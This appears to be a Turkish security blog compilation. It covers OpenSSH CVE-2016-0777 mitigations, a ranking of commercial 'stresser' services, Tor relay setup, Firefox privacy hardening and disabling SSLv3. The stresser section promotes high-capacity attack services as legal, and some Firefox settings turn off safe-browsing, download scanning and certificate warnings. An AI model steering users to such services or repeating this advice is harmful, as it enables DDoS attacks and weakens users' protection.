OpenSSH projesinde 15 Ocak itibari ile tespit edilmiş ve sunucu tarafındaki gizli anahtarların çalınmasına yol açabilecek olan kritik güvenlik zafiyeti CVE-2016-0777 ve CVE-2016-0778 kodu ile yayınlanmıştır.Etkilenmiş olan sistemlerde bu açıktan faydalanmak için aşağıdaki uygulamayı kullanmak mümkün

CVE-2016-0777 Exploit

Bu zafiyetten etkilenen işletim sistemleri ise şunlardır;

  • CentOS Linux 7.x
  • RHEL (RedHat Enterprise Linux) 7.x
  • Debian Linux (squeeze, wheezy, jessie, stretch, and sid release)
  • Ubuntu Linux 15.10
  • Ubuntu Linux 15.04
  • Ubuntu Linux 14.04 LTS
  • Ubuntu Linux 12.04 LTS
  • SUSE Linux Enterprise Server 12 (SLES 12)
  • SUSE Linux Enterprise Server 12 Service Pack 1 (SLES 12 SP1)
  • SUSE Linux Enterprise Server 11 Service Pack 4 (SLES 11 SP4)
  • SUSE Linux Enterprise Server 11 Service Pack 3 (SLES 11 SP3)
  • openSUSE 13.2
  • openSUSE Leap 42.1

Etkilenen sürümler ise 4.7 ile 7.1 arasındaki tüm sürümler olarak tespit edilmiştir.

Bu Zafiyetden etkilenmemek amacıyla sisteminizde aşağıdaki değişiklikleri gerçekleştirdiğiniz taktirde güncelleme yayınlanana kadar korunmuş olacaksınız.

FreeBSD

sudo -s
echo 'UseRoaming no' >> /etc/ssh/ssh_config

Tüm Linux Sistemler

sudo su
echo 'UseRoaming no' | sudo tee -a /etc/ssh/ssh_config

MacOS Sistemler

echo "UseRoaming no" >> ~/.ssh/config

OpenBSD

su -
echo -e 'Host *nUseRoaming no' >> /etc/ssh/ssh_config

CVE-2016-0778 Zafiyetinden kurtulmak için ise

Sistemlerinizi güncellemeniz yeterlidir.böylelikle CVE-2016-0778 zafiyetinden kolaylıkla korunabilirsiniz.

Debian Tabanlı Sistemler

sudo apt-get update
sudo apt-get upgrade

CentOS

sudo yum update

FreeBSD

freebsd-update fetch
freebsd-update install

En iyi 3 Stress Test Aracı

Stress test araçları günümüzde oldukça fazla yaygın bir biçimde kullanılan legal çalışma ortamlarıdır.kendiniz oluşturabileceğiniz gibi hazır olarak piyasada bulunan siteleri ve uygulamaları da kullanabilirsiniz.Oluşturmuş olduğunuz dış dünyaya yayın yapan bir sistemi bir çok tehlikeli durum bekler bunlardan belkide en sık karşılaşılan Ddos ve botnet gibi popüler olan saldırı çeşitleridir. Ücretli olarak bir test ortamı edinebilirsiniz tabi ki bunlar legal çerçevede gerçekleşecek

1.Critical Boot

Oldukça güçlü ve sırf bu stress işleri için kullanılan özel alt yapıları bulunmaktadır. Maximum test edilebilir kapasitesi 70 Gbit olarak ölçülmüştür. Yapılan testler ve(veya) saldırılar bilginiz dahilinde gerçekleşmiyor ise abuse işlemi ile saldırıyı kimin gerçekleştirdiğini detaylı olarak öğrenebilmeniz mümkün(İP bilgisi,kullancı adı ve mail bilgileri)

stresstestcritical

2.Stage Stresser

Gerçekleştirilen her bir testin ve veya saldırının boyutu 10 gbit ile limitlenmiş olup oldukça etkili yöntemler ile sistemlerinizi test edebilirsiniz.5 adet yöntem bulunmaktadır.Korumasını sağladığınız yada olduğunu düşündüğünüz yöntemleri bu sistem ile test edebilme imkanınız bulunuyor.legal çerçevede gerçekleştirilecek olan bu yöntemde izinsiz yapılan saldırılar sonucunda gerekli bilgiyi firmadan talep edebilirsiniz.Toplam network kapasitesi 200Gbit olarak bilinmektedir.

stagestress2

3.Thunder Stresser

Gerek koruma hizmeti sağlayan gerekse test ortamı sunan bu firmamızda ise her zamankinden yüksek network kapasitesi görmekteyiz yaklaşık olarak 400Gbit toplam kapasiteleri bulunmakta saldırı ve savunma taktikleri için oldukça faydalı üstelik web sitesi size telefon uygulaması ile de farklı bir test ortamı sağlıyor.Legal olarak yapacağınız tüm stress testlerinde ve saldırılarda bir sıkıntı çıkmayacaktır.İzinsiz bir test işlemi görüldüğü taktirde firma ile gerekli yazışmaları yaptığınız da direk olarak kimin ne yaptığı bilgisini edinebilirsiniz.

thunderstress3

Bir kez daha hatırlatmamda fayda var yukarıdaki test yöntemlerini illegal bir biçimde kullanmanız dahilinde şikayet olunduğu taktirde çok ciddi yaptırımlar uygulanmaktadır.Lütfen kişisel ihtiyaçlarınız ve test işlemleriniz dışında kullanmayınız.

Tor Relay Olmak için Yapılması Gerekenler

Tor(The Online Routing) yıllardır kullanıcıların internet üzerindeki faliyetlerini anonimleştirmek için geliştirilmiş bir yazılım projesidir.Kendi nodeleri üzerinden kullanıcıların gerçek kimliklerini gizleyip şifreler işte biz bu yapıya dahil olacağız hem nimetlerinden faydalanmış olacağız hemde ağa katılmış olacağız.Tor bilindiği üzere kötü bir şekilde ünlendi illegal faliyetlerin tor üzerinden yapılması da bunun tuzu biberi oldu

Bu yazımda ise sizlere bu ağ içerisinde relay olma imkanı sunacağım yani aracı olacaksınız. Trafik sizin bağlantınız üzerindende geçecek böylelikle Tor bir katkıda sizler sağlamış olacaksınız. Korkmayın tor üzerinde yapılanlardan siz sorumlu olmazsınız sonuç itibariyle aracısınız bağlantı sadece üzerinizden direk olarak geçecek sonrasında Exit Relay aracılığı ile son bulacak biz ise sadece Relay olacağız yani sadece aradaki bir unsur olacağız

Öncelikli olarak yapmanız gereken sisteminize ntp kurmak sistem saatinizin güncel olması ve senkronize olması önemli.Bunun için

sudo apt-get install ntp

komutunu vermek daha sonradan ise sunucuları tanımlamak bunun için türkiye sunucularını seçebiliri fark etmiyor yeterki uyumlu olsun

sudo nano /etc/ntp.conf

içerisine ise şu satırları ekleyip sunucuları güncelleyeceksiniz.Eski kayıtları

server 0.tr.pool.ntp.org
server 1.tr.pool.ntp.org
server 2.tr.pool.ntp.org
server 3.tr.pool.ntp.org

Evet saatde tamamen rayına girdiğine göre gereken asıl işlemlere başlayalım.Torun sisteminizde kurulu olması lazım daha sonra ise kurulu olan bu torun relay olması için gerekli ayarların yapılım tamamlanmış olması gerekiyor.

sudo apt-get install tor

tor paketi yanında birkaç ek paket daha kurulacaktır.Bu kurulumdan sonra ise relay aşaması için yapılandırma yapmamız gerekiyor.yapılandırma yapılmamış ise kullanmış olmuyorsunuz.

sudo nano /etc/tor/torrc

dosya içerisi ön tanımlı olarak bir takım parametreler ile doldurulmuş ancak çalışır durumda değil çalışır hale getirmek için aşağıdaki gibi düzenleme yapmanız gerekiyor.

torrcayarlarigorsel1
RunAsDaemon 1
ORPort 9001
DirPort 9030
ExitPolicy reject *:*
Nickname ox2e88ce4
RelayBandwidthRate 1 MB
RelayBandwidthBurst 2 MB
AccountingStart month 1 00:00
AccountingMax 100 GB
DisableDebuggerAttachment 0

yukarıdaki parametreleri ise şu şekilde tanımlayabiliriz.

  • RunAsDeamon – sistemde servislerini tanımlar
  • ORPort – torun çıkış portu diğer istemciler ile iletişimini sağlar
  • DirPort – tor dizinini duyurabileceğiniz bağlantı noktasıdır.Trafiğiniz sınırsız veya yeterli ise kullanmanız önerilir
  • ExitPolicy – Çıkış unsuru olup olmayacağınızı bu komutlar ile belirleyebilirsiniz biz reject *:* diyerek sadece relay yani ara unsur olmayı seçtik
  • Nickname – Sistemde kullanabileceğiniz bir takma isim
  • RelayBandwidthRate – unsur olarak torun kullanabileceği ağ hızını tanımlar
  • RelayBandwidthBurst – unsur olarak torun kullanabileceği maximum ağ hızını tanımlar
  • AccountingStart – hesabınızın trafik sayacının saat kaçda başlamasını istiyorsanız bunu girebilirsiniz aylık haftalık veya günlük olarak tanımlama yapabilirsiniz.
  • AccountingMax – torun sisteminizde kullanabileceği maximum toplam trafiği belirtir.
  • DisableDebuggerAttachment – hata ayıklama modunu kapatır.

Belirtmiş olduğum parametreler Relay olabilmeniz için olmazsa olmaz diyebileceğimiz parametrelerdir.Eğer herhangi bir sunucunuz varsa ve bunu Exit Relay(Çıkış unsuru) yapmak istiyorsanız daha farklı bir yol izlemeniz gerekiyor.

Nickname %NICK
ORPort %IP:%PORT
DirPort %IP:%DIRPORT
Address %IP
OutboundBindAddress %IP 

##IPv6
#IPv6Exit 1
#ORPort [a:b:c:d::e]:port
#OutboundBindAddress [a:b:c:d::e]
#ExitPolicy reject6 *:25,accept6 *:*

DataDirectory /var/lib/tor/%INSTANCE
PidFile /var/run/tor/tor%INSTANCE.pid
Log notice file /var/log/tor/notices%INSTANCE.log

RelayBandwidthRate 30 MBytes
RelayBandwidthBurst 100 MBytes

MyFamily %MYFAMILY

ContactInfo https://www.torservers.net/donate.html <support .AT. torservers .DOT. net>
DirFrontPage /etc/tor/tor-exit-notice.html
CellStatistics 1
DirReqStatistics 1
EntryStatistics 1
ExitPortStatistics 1
ExtraInfoStatistics 1
HiddenServiceStatistics 1

SocksPort 0
SocksPolicy reject *

RunAsDaemon 1

# https://trac.torproject.org/projects/tor/wiki/TheOnionRouter/ReducedExitPolicy
# 05.07.2015 
ExitPolicy accept *:20-23     # FTP, SSH, telnet
ExitPolicy accept *:43        # WHOIS
ExitPolicy accept *:53        # DNS
ExitPolicy accept *:79-81     # finger, HTTP
ExitPolicy accept *:88        # kerberos
ExitPolicy accept *:110       # POP3
ExitPolicy accept *:143       # IMAP
ExitPolicy accept *:194       # IRC
ExitPolicy accept *:220       # IMAP3
ExitPolicy accept *:389       # LDAP
ExitPolicy accept *:443       # HTTPS
ExitPolicy accept *:464       # kpasswd
ExitPolicy accept *:465       # SMTP over SSL (authenticated SMTP users)
ExitPolicy accept *:531       # IRC/AIM
ExitPolicy accept *:543-544   # Kerberos
ExitPolicy accept *:554       # RTSP
ExitPolicy accept *:563       # NNTP over SSL
ExitPolicy accept *:587       # SUBMISSION
ExitPolicy accept *:636       # LDAP over SSL
ExitPolicy accept *:706       # SILC
ExitPolicy accept *:749       # kerberos 
ExitPolicy accept *:873       # rsync
ExitPolicy accept *:902-904   # VMware
ExitPolicy accept *:981       # Remote HTTPS management for firewall
ExitPolicy accept *:989-995   # FTP over SSL, Netnews Administration System, telnets, IMAP over SSL, ircs, POP3 over SSL
ExitPolicy accept *:1194      # OpenVPN
ExitPolicy accept *:1220      # QT Server Admin
ExitPolicy accept *:1293      # PKT-KRB-IPSec
ExitPolicy accept *:1500      # VLSI License Manager
ExitPolicy accept *:1533      # Sametime
ExitPolicy accept *:1677      # GroupWise
ExitPolicy accept *:1723      # PPTP
ExitPolicy accept *:1755      # RTSP
ExitPolicy accept *:1863      # MSNP
ExitPolicy accept *:2082      # Infowave Mobility Server
ExitPolicy accept *:2083      # Secure Radius Service (radsec)
ExitPolicy accept *:2086-2087 # GNUnet, ELI
ExitPolicy accept *:2095-2096 # NBX
ExitPolicy accept *:2102-2104 # Zephyr
ExitPolicy accept *:3128      # SQUID
ExitPolicy accept *:3389      # MS WBT
ExitPolicy accept *:3690      # SVN
ExitPolicy accept *:4321      # RWHOIS
ExitPolicy accept *:4643      # Virtuozzo
ExitPolicy accept *:5050      # MMCC
ExitPolicy accept *:5190      # ICQ
ExitPolicy accept *:5222-5223 # XMPP, XMPP over SSL
ExitPolicy accept *:5228      # Android Market
ExitPolicy accept *:5900      # VNC
ExitPolicy accept *:6660-6669 # IRC
ExitPolicy accept *:6679      # IRC SSL  
ExitPolicy accept *:6697      # IRC SSL  
ExitPolicy accept *:8000      # iRDMI
ExitPolicy accept *:8008      # HTTP alternate
ExitPolicy accept *:8074      # Gadu-Gadu
ExitPolicy accept *:8080      # HTTP Proxies
ExitPolicy accept *:8082      # HTTPS Electrum Bitcoin port
ExitPolicy accept *:8087-8088 # Simplify Media SPP Protocol, Radan HTTP
ExitPolicy accept *:8332-8333 # Bitcoin
ExitPolicy accept *:8443      # PCsync HTTPS
ExitPolicy accept *:8888      # HTTP Proxies, NewsEDGE
ExitPolicy accept *:9418      # git
ExitPolicy accept *:9999      # distinct
ExitPolicy accept *:10000     # Network Data Management Protocol
ExitPolicy accept *:11371     # OpenPGP hkp (http keyserver protocol)
ExitPolicy accept *:19294     # Google Voice TCP
ExitPolicy accept *:19638     # Ensim control panel
ExitPolicy accept *:50002     # Electrum Bitcoin SSL
ExitPolicy accept *:64738     # Mumble
ExitPolicy reject *:*

Exit Relay olurken dikkat etmeniz gerekiyor zira tüm trafik sizde sonlanacak yani adam her hangi bir illegal iş gerçekleşirse son olarak sizin ip adresiniz gözükecek bu noktada sunucunuza kurarken yapılandırmanızı ona göre ve iyi bir şekilde yapmanız gerekiyor.

Ayarlamalarınız bitti ise tor sürecini yeniden başlatmanız gerekecek ki yeni tanımladığınız ayarlar geçerli olsun

sudo service tor restart

Çalışıp çalışmadığını yada işlemin nasıl ilerlediğini sistemdeki log kayıtlarına bakarak anlayabilirsiniz. Aşağıdaki gibi bir çıktı vermiş ise doğru yoldasınız demektir.

logciktisigorsel2

buraya kadar sorunsuz bir şekilde geldiyseniz artık tor ağı üzerinde bir relay olarak gözüküyorsunuz ve tarafınıza uniq bir kimlik tanımlayıcı verilmiş demektir.Bunu yönetmek ve görüntülemek istiyorsanız aşağıdaki paketi kurmanız yeterlidir.

sudo apt-get install tor-arm

kurulumu yaptıktan sonra ise aşmanız gereken bir sorun bulunuyor tor-arm belirli bir kullanıcı tarafından kullanılmak zorunda buda kendi içerisinde tanımlı olarak gelen debian-tor kullanıcısı yani izleme işlemi yaparken direk olarak arm diyip açmanız bir işe yaramaz istatistikleri doğru bir şekilde alamazsınız.Doğru olan komut ise şu şekilde;

sudo -u debian-tor arm

Komutumuzu verdik ve artık ne kadar trafik harcadığını görebilir ayarlamaları buradan yapabilirsiniz.

torrelaygorsel3

Mozilla Firefox Güvenlik ve Gizlilik Ayarları

Mozilla firefox kullanan kullanıcıları için güncel güvenlik ve gizlilik parametrelerini içerir.Tüm işlemler about:config bölümü altında yapılacak ve gerekli eklentiler tavsiye edilecektir.Oluşabilecek hatalardan kullanıcı sorumludur.Güvenliğinizi ve gizliliğimizi %100 sağlamaz ve bunu garanti veremeyiz.Yapılacak olan tüm işlevler tarayıcınızda güvenlik önlemleri almaktan ödeye gitmeyecektir.

_______  _______ _________        _______  _______          
(  ____ (  ____ \__   __/       (  ____ (  ___  )|     /|
| (    /| (    /   ) (          | (    /| (   ) |(    / )
| (_____ | (__       | |    _____ | (__    | |   | |  (_) /
(_____  )|  __)      | |   (_____)|  __)   | |   | |  ) _ (  
) || (         | |          | (      | |   | | / ( ) 
/____) || (____/   | |          | )      | (___) |( /    )
_______)(_______/   )_(          |/       (_______)|/     |
########################################################################################
# https://mertcangokgoz.com && 
# Kurulması Önerilen eklentiler
Random User Agent Spoofer(https://github.com/dillbyrne/random-agent-spoofer)
uBlock Origins(https://github.com/gorhill/uBlock)
Https-Everywhere(https://www.eff.org/https-everywhere%20)
Disconnect(https://addons.mozilla.org/en-US/firefox/addon/disconnect/)
No Youtube Comment(https://addons.mozilla.org/en-US/firefox/addon/no-youtube-comments/)
Self-Destructing Cookies(https://addons.mozilla.org/en-US/firefox/addon/self-destructing-cookies/)
No-Script(https://addons.mozilla.org/en-US/firefox/addon/noscript/)
RequestPolicy(https://addons.mozilla.org/en-US/firefox/addon/requestpolicy-continued/)
SSLeuth(https://addons.mozilla.org/en-US/firefox/addon/ssleuth/)
#Yapılması istenilen about:config ayarları aşağıda açıklamaları ile birlikte verilmiştir.
########################################################################################
#WebGL özelliğinin tarayıcı üzerinden kapatılmasını sağlar
webgl.disabled -> TRUE
#Flashplayer eklentisinin tarayıcı üzerinden kapatılmasını sağlar
plugin.state.flash -> 0
#Java uygulamalarının Çalışmalarına engel olur
plugin.state.java -> 0
#DNS sorguları tanımlanan dns üzerinden akması için yapılacak işlemler(proxy gerekir)
network.proxy.socks_remote_dns -> TRUE
#Referrer bilgisinin gizlenmesi
network.http.sendRefererHeader -> 0
#konum bilgilerinin kapatılması
geo.enabled -> FALSE
beacon.enabled -> FALSE
#bilgilerin yönlendirildiği URL "localhost" olarak ayarlanması önerilir.
geo.wifi.uri (string => http://localhost)
#Güvenli arama özelliklerini açma işlemi
browser.safebrowsing.enabled -> TRUE
browser.safebrowsing.downloads.enabled -> FALSE
browser.safebrowsing.malware.enabled -> TRUE
#İndirilen dosyaların taranma özelliğinin kapatılması
browser.download.manager.scanWhenDone -> FALSE
#Arama önerilerinin kapatılması işlemi
browser.search.suggest.enabled -> FALSE
#PDF dosyalarını okuyabilmeyi kaptmak
pdfjs.disabled -> TRUE
#Tıklama işlemi ile bazı eklentilerin çalıştırılması işlemi
plugins.click_to_play -> TRUE
#Videoların otomatik başlamasını önleme(HTML5 videolar için)
media.autoplay.enabled -> FALSE
#sekmelerin senkronize edilmesini kapatmak
services.sync.engine.tabs -> FALSE
#Ayarların senkronize edilmesini kapatmak
services.sync.engine.prefs -> FALSE
#şifrelerin senkronize edilmesini kapatmak
services.sync.engine.passwords -> FALSE
#geçmişin senkronize edilmesini kapatmak
services.sync.engine.history -> FALSE
#Sık kullanılanların senkronize edilmesini kapatmak
services.sync.engine.bookmarks -> FALSE
#Eklentilerin senkronize edilmesini kapatmak
services.sync.engine.addons -> FALSE
#her daim gizli sekme açılmasını sağlama
browser.privatebrowsing.autostart -> TRUE
#Offline Cache Kapatmak
browser.cache.offline.enable -> FALSE
#Cache kapatmak
browser.cache.disk.enable -> FALSE
#Cachede tutulacak alanın boyutunu ayarlama
browser.cache.offline.capacity -> 0
#WEBRTL sızıntısına engel olma
media.peerconnection.enabled -> FALSE
loop.enabled -> FALSE
#gösterilen faviconların kapatılması işlemi
browser.chrome.favicons -> FALSE
#Şifreli medya ekipmanlarının kapatılması işlemi(DRM)
media.eme.enabled -> FALSE
media.gmp-eme-adobe.enabled -> FALSE
#raporlama seviyesinin belirlenmesi aşaması
toolkit.telemetry.prompted -> 2
#tarayıcı sağlık raporlamalarının kapatılması işlemi
toolkit.telemetry.enabled -> FALSE
datareporting.healthreport.uploadEnabled -> FALSE
datareporting.policy.dataSubmissionEnabled -> FALSE
#eklentilerin çökme raporlarının kapatılması işlemi
dom.ipc.plugins.flash.subprocess.crashreporter.enabled -> FALSE
#senkronizasyon URL sinin silinmesi işlemi
services.sync.serverURL -> ""
#Do Not Track Özleliğinin aktif hale getirilmesi
privacy.donottrackheader.enabled -> TRUE
#Do Not Track header ayarlama aşaması
privacy.donottrackheader.value -> 1
#Yazım denetiminin kapatılması
layout.spellcheckDefault -> 0
#devre dışı sertifika uyarısını bypass etme
browser.xul.error_pages.enabled -> FALSE
#İçerik Güvenlik Politikası desteğini etkinleştirme
security.csp.enable -> TRUE
#XSS filtresini aktif etme işlemi
browser.urlbar.filter.javascript
#Ön tanımlı olarak gelen tüm eklentilerin kapatılması işlemi
plugin.default.state -> 0
plugin.defaultXpi.state ->
#Webcam ve Mikrofon kullanımını kapatma işlemi
media.navigator.enabled -> FALSE
media.navigator.video.enabled -> FALSE
#Otomatik form doldurma özelliğini kapatma
signon.autofillForms -> FALSE
signon.rememberSignons -> FALSE
#Tarayıcı kapatıldığında tüm verilerin temizlenmesi özelliğini aktif hale getirme işlemi
privacy.sanitize.sanitizeOnShutdown -> TRUE
privacy.clearOnShutdown.cookies -> TRUE
privacy.clearOnShutdown.downloads -> TRUE
privacy.clearOnShutdown.cache -> TRUE
privacy.clearOnShutdown.formData -> TRUE
#izinsiz gezinmeyi engelleme
network.http.speculative-parallel-limit -> 0
#bilinen takip domainlerinin kapatılmasını aktifleştirme
privacy.trackingprotection.enabled -> TRUE
#takip etme özelliklerinin kapatılması(yüz tanıma,hareket ve sensörler)
device.sensors.enabled -> FALSE
camera.control.face_detection.enabled -> FALSE
camera.control.autofocus_moving_callback.enabled -> FALSE
#Tarayıcı üzerindeki sosyal medya entegrasyonlarının devre dışı bırakılması
social.directories -> ""
social.whitelist -> ""
social.manifest.facebook -> ""
social.remote-install.enabled -> FALSE
social.toast-notifications.enabled -> FALSE
#pocket entegrasyonunun kapatılması
browser.pocket.enabled -> FALSE
#Casus Javascript ekipmanlarının engellenmesi
dom.event.clipboardevents.enabled -> FALSE
dom.battery.enabled -> FALSE
browser.send_pings -> FALSE
#Wecsocket özelliğinin kapatılması(yönlendirmesel açıkları giderir)
network.websocket.enabled -> FALSE
#Adres çubuğundaki dropdown list şeklinde gelen sonuçları kapatma
browser.urlbar.maxRichResults -> 0
#TLS v1.2 kullanmaya zorlama
security.tls.version.min -> 3
#ecdhe/dhe chiplerlarını kapatma işlemi
security.ssl3.rsa_aes_256_sha -> FALSE
#Zayıf ve şifreleri çözülmüş algoritmaları kapatma
security.tls.unrestricted_rc4_fallback -> FALSE
security.tls.insecure_fallback_hosts.use_static_list -> FALSE
security.OCSP.enabled -> 1
security.OCSP.require -> TRUE
#(3DES, RC4 ve MD5) gibi kullanılmayan protokolleri kapatma
security.ssl3.rsa_rc4_128_sha -> FALSE
security.ssl3.rsa_rc4_128_md5 -> FALSE
security.ssl3.rsa_des_ede3_sha -> FALSE
security.ssl3.ecdhe_ecdsa_rc4_128_sha ->FALSE
security.ssl3.ecdhe_rsa_rc4_128_sha -> FALSE
security.ssl3.rsa_aes_256_sha -> FALSE
#Eklentilerin otomatik güncelleştirmelerinin açılması işlemi
extensions.update.enabled -> TRUE
#Deneysel özelliklerin kapatılması
experiments.supported -> FALSE
experiments.enabled -> FALSE
#ads ve önyüklemeyi kapatma
browser.newtabpage.enhanced -> FALSE
browser.newtab.preload -> FALSE
#Bu özellikler araştırılacak
browser.newtabpage.directory.ping -> ""
browser.newtabpage.directory.source -> "data:text/plain,{}"
#Kullanıcı popülasyon analizi ve tarayıcı durumunu raporlanmasını durdurma
browser.selfsupport.url -> ""
#önalımın kapatılması
network.prefetch-next -> FALSE
#ülke bazlı arama motoru yönlendirilmesini kapatma
browser.search.geoip.url ->""
#DNS önalım özelliğini kapatma
network.dns.disablePrefetch -> TRUE
network.dns.disablePrefetchFromHTTPS -> TRUE
#Necko özelliğini kapatma(https://wiki.mozilla.org/Privacy/Reviews/Necko)
network.predictor.enabled -> FALSE
#Snippet sunucusu URL Kaldırma(https://support.mozilla.org/en-US/kb/how-stop-firefox-making-automatic-connections#w_mozilla-content)
browser.aboutHomeSnippets.updateUrl -> ""
#CSP(Content Security Policy) Özelliğinin aktifleştirilmesi(https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy)
security.csp.enable -> TRUE
#Referrer spoof işlemi
network.http.referer.spoofSource -> TRUE
#Pipelining özelliğinin aktif hale getirilmesi açılış hızlarına etki ettiği söylenebilir.
network.http.pipelining -> TRUE
network.http.pipelining.maxrequests -> 8

Firefox DNS Önbelleğini Kapatma

Firefox güvenlik sıkılaştırmaları yapmaya tam gaz devam ediyoruz şimdi ise Firefox’un dns ön belleğini kapatmayı göstereceğim bunu yapma nedenimiz bilgisayarımızda daha az gezdiğimiz siteler hakkında verilerin azalması her seferinde temizlenmesi bu açıdan işimize yarayacak işlemleri yaptıktan sonra web sitelerine eskisi gibi belki giremeyeceksiniz 1 sn gibi bir gecikme yaşayacaksınız.

İlk olarak tarayıcımızdaki tüm sekmeleri kapatarak işlemimize başlayalım sonra ise adres girdiğimiz çubuğa about:config diyelim ve gereken yere ulaşalım.Garantiden çıkacaksınız falan diyecek evet diyip geçiyoruz.

aboutconfiggorsel1

Burada bir çok ayar göreceksiniz bize lazım olan ise network.dnsCacheExpiration bunu arama kısmına yazıyoruz ve karşımıza 2 değer çıkıyor. Aşağıdaki gibi değiştiriyoruz.

dnsexpirationgorsel1

İşlemimiz tamamlanmış oluyor artık Firefox dns sorularınızı tutmayacak biraz daha güvenli bir şekilde gezine bilirsiniz. Anlık olarak sıfırlanacak bazı web siteleri kağnı gibi açılabilir tekrardan söylüyorum. Dikkat Ediniz.

Eğer network.dnsCacheExpiration değeri sistem içerisinde yok ise alana sağ tıklayıp Properties > New > Integer dediğiniz anda gereken şekilde değeri oluşturabilirsiniz.

Firefox Güvenlik Sıkılaştırması

Firefox üzerinde oldukça fazla durmaktayım bunun nedeni özellikle güvenlik açıkları konusunda oldukça hassas davranması gerekse virüslerin direk olarak Firefox hedef alsa bile çalışma olasılıklarının düşük olması bunun yanı sıra kullanıcıya daha çok imkan sağlıyor.

Bu makalemizde size özellikle Firefox üzerinde yapılabilecek kritik güvenlik ayarlarını göstereceğim sızıntıları engelleyeceğiz ve gizliliğimizi bir tık daha ileri taşıyacağız bu konu hakkında yazdığım 2.makale bu makalede biraz daha sistem içerisine gideceğiz ve bir takım ek önlemler alacağız.

İlk olarak firefox da kullanacağınız eklentiler;

  1. CanvasBlocker -> https://addons.mozilla.org/nl/firefox/addon/canvasblocker/
  2. uBlock Origins -> https://addons.mozilla.org/tr/firefox/addon/ublock-origin/
  3. Disconnect.me -> https://addons.mozilla.org/en-US/firefox/addon/disconnect/?src=external-product-icon
  4. HTTPS-Everywhere -> https://addons.mozilla.org/nl/firefox/addon/https-everywhere/
  5. Cookie AutoDelete -> https://addons.mozilla.org/en-US/firefox/addon/cookie-autodelete/

Eklentileri tek tek kurdunuz filtreleri tek tek yüklediniz. Tüm canvasları blockladığınıza göre gelelim ana yapılacaklara. Normal bir internet kullanıcısı internet de gezer video izler Facebook da dolaşır arkadaşlarını dürter yada Twitter da tweet atar ama potansiyel kötücüller bu arkadaşı beklemektedir.Biz elimizden geldiği kadar sızıntıları önleyelim ayarlarımızı yapalım.

Firefox’da ayar sayfasına ulaşalım bunun için about:config komutunu adres girdiğiniz çubuğa yazın gelen uyarıya he deyip geçin ve işlemlerimize başlayalım. Yapacaklarınız oynadığınız online oyunları etkileyebilir web sitelerinde gireceğiniz sitelerdeki bazı özelliklerin çalışmamasına neden olabilir.

#DNS sorguları tanımlanan dns üzerinden akması için yapılacak işlemler
network.http.sendRefererHeader -> 0
network.proxy.socks_remote_dns > TRUE
#konum bilgilerinin kapatılması mutlaka önerilir
geo.enabled > FALSE
geo.wifi.uri (string => http://localhost)
#güvenli arama fonksiyonlarının ayarlanması
browser.safebrowsing.enabled > FALSE
browser.safebrowsing.malware.enabled > FALSE
browser.download.manager.scanWhenDone > FALSE
#yazarken yapılan aramanın kapatılması
browser.search.suggest.enabled > FALSE
#PDF ayarları
pdfjs.disabled > TRUE
plugins.click_to_play > TRUE
#Videoların otomatik başlamasını önleme(HTML5 videolar için)
media.autoplay.enabled > FALSE
#ön tanımlı olarak gelen sync özelliklerini kapatmak
services.sync.engine.tabs -> FALSE
services.sync.engine.prefs -> FALSE
services.sync.engine.passwords -> FALSE
services.sync.engine.history -> FALSE
services.sync.engine.bookmarks -> FALSE
services.sync.engine.addons -> FALSE
#herdaim gizli sekme açılmasını sağlama
browser.privatebrowsing.autostart -> TRUE
#DOM disk alanının sıfırlanması ve kapatılması işlemi
browser.cache.offline.enable -> FALSE
browser.cache.disk.enable -> FALSE
browser.cache.offline.capacity -> 0
#WEBRTL açığının giderilmesi
media.peerconnection.enabled -> FALSE
#WEBGLnin kapatılması
webgl.disable -> TRUE

Bu işlemleri yaptıktan sonra video oynatıcısını yani flash playeri de kapatmamız gerekiyor bunun yanında javayıda kapatacağız.Bunun için yapmanız gerekenler

Menu > Add-ons > Plugins

yoluna gidiyorsunuz burada tüm java yazan ve tüm flash yazanları kapatıyoruz. Örnek olarak;

firefoxgizlilikgorsel1

Bunların yanında haliyle sistemde kurulu olan Adobe Flash Playeri kaldırıyoruz. Zaten siz kaldırmazsanız da bir sonraki firefox versiyonunda flash player kapalı gelecek sıfırıncı gün açıklarından başka türlü kulturmanın yolu yok

Bu işlemler sonrasında iyide bir dns seçmemiz gerekiyor bunun için size artık açık seçik ip adreslerinden bahsetmeyeceğim yada ne bileyim şunu kullanın demeyeceğim bu işinde suyu çıktı biraz daha kuvvetli bir yapısı olan DNSCrypt kullanacağız böylelikle araya giren çıkan olmayacak

Anlatımı bu sefer Windows üzerinden yapacağım. İlk olarak uygulamayı indirelim. Ben sizin için toparladım hepsini aşağıdaki bağlantıdan indirebilirsiniz.Yada resmi sitesinden indirip kurabilirsiniz.

Derlenmiş haline ulaşmak için tıklayınız.

İndirdiğiniz uygulama içerisinde bazı dns servisleri bulunmaktadır bunlardan faydalanabilirsiniz.İstediğinizi seçmekte özgürsünüz ama benim önerim oVPN sitesinin DNS sunucularını kullanmaktır.Şu ana kadar gördüğüm en güvenli ve uptime en yüksek servislerden bir tanesidir.

yönetici olarak programı açtığınızda ayarları yapmanız gerekiyor bunun için ilk önce config sekmesinden aşağıdaki gibi bir dns sunucusu seçiyoruz.

2_x8mh6p

Ben özellikle beğendiğim OVPN sitesinin sunucularını kullanacağım.Daha sonra ise NICs sekmesine geçiyorsunuz.

dnscryptgorsel2

Bu kısımdan yapmanız gereken sisteminizdeki kullandığınız ağları seçmek daha sonra İnstall butonuna basmak ben daha önceden kurduğum için Unistall aktif ancak sisteme ilk defa kuruyorsanız size direk install gözükecektir.daha sonra çalıştırıyoruz ve işlemimiz tamamlanıyor.

Artık DNS sorgularımız daha güvenli bir hale geldi bundan sonrasında VPN kullanarak bağlantınızı güvenli hale getirebilirsiniz.yada istediğiniz bir yapılandırma ile devam edebilirsiniz.

Sunucularda SSLv3 Devre Dışı Bırakma İşlemi

Bildiğiniz üzere SSLv3 üzerinde bulunan açıklar sunucu ve sistemleri ciddi bir şekilde etkiliyordu sonraları anlaşıldıki bu protokolün kapatılması ile Poodle açığını durdurabiliyorduk.Sunucu tabanında ise bu işlemi yapmak için bir kaç yol mevcut bunlar ise

IIS

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersSCHANNELProtocolsSSL 3.0Server]
"Enabled"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersSCHANNELProtocolsSSL 2.0Server]
"Enabled"=dword:00000000

Nginx

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

Lighttpd

ssl.use-sslv2 = "disable"
